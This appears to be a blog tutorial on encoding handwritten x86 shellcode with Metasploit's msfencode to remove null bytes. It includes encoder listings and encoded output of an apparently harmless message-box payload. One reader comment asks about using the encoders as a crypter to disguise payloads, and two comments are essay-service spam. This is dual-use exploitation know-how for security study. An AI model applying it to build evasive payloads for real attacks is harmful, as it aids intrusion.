Encoding your handmade shell code using Metasploit Encoder

Encoding of shell code is important in real time exploitation b'coz,when you create a shell code that shell code may contain some bad characters,null bytes.Either the transmission protocol, or the end application
can be sensitive to "bad characters" which can break your shellcode in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you are using shell code present in Metasploit framework,then you dont have to concentrate on shell code encoding.Metasploit by default encode the shell code when you are using in the exploitation.
But in many situation when you are using your own shell code in exploits then the shell code must be bad character free.
So to do that you can use Metasploit to encode your handmade shellcode.

To get a list of all encoders present in metasploit framework by running the ./msfencode -l command.
root@bt:~#./msfencode -l -a x86 

Framework Encoders (architectures: x86)
=======================================

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder
The default encoder in Metasploit is x86/shikata_ga_nai

Suppose you have just written the follwoing shell code
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
So to encode the shell code first you have to write the shell code into a binary file.So to do that you can choose any scripting langugae.

Here i will use python.
shell = ("\x68\x6c\x61\x6e\x00\x68\x43\x6f
\x72\x65\x89\xe3\x68\x61\x6e\x20
\x00\x68\x6f\x72\x65\x6c\x68\x62
\x79\x20\x43\x68\x6e\x65\x64\x20
\x68\x6e\x20\x70\x77\x68\x20\x62
\x65\x65\x68\x68\x61\x76\x65\x68
\x59\x6f\x75\x20\x89\xe1\x31\xc0
\x50\x53\x51\x50\x50\xbe\xea\x07
\x45\x7e\xff\xe6\x31\xc0\x50\xb8
\x12\xcb\x81\x7c\xff\xe0")
file = open('shellcode.bin','w')
file.write(shell)
file.close()


After running the script you will get a shell.bin file.Now you are almost done.You just have to fire msfencode to encode the shell code for you.

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
So this is the Bad character and Null free fully working shell code.

Encode using x86/alpha_mixed

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";

Comments

  1. Nice Article. Is it possible to use these encoders as kind of crypter? I mean can I encode my payload using any of these encoders???

    ReplyDelete
  2. Hallo! Vielen dank für diese interessanten und nützlichen informationen, die sie hier gepostet haben. Ich lese diesen blog wirklich gerne, wenn ich freizeit habe! Aber ich möchte meine persönlichen erfahrungen im studium teilen. Ich bin gerade mit der fachoberschule fertig geworden und habe wie fast alle schüler versucht, das studium und einen nebenjob zu kombinieren, aber es ist ja bekanntlich so eng an zwei orten gleichzeitig zu sein und gut zu lernen. Aber professionelle autoren von online-unternehmen haben mir sehr geholfen, mein studium so viel einfacher als je zuvor zu machen (präsentation bachelorarbeit beispiel finden sie hier). Sie können auf ihre online-seite klicken, wenn sie der beste lernende in all ihren college-fächern sein möchten.

    ReplyDelete
  3. Students who cannot write an interesting essay often opt for essay writing services. These online services provide students with the opportunity to get the help they need. Students do not need to face any problems while working with these do my assignment services. They can complete their papers easily.

    ReplyDelete

Post a Comment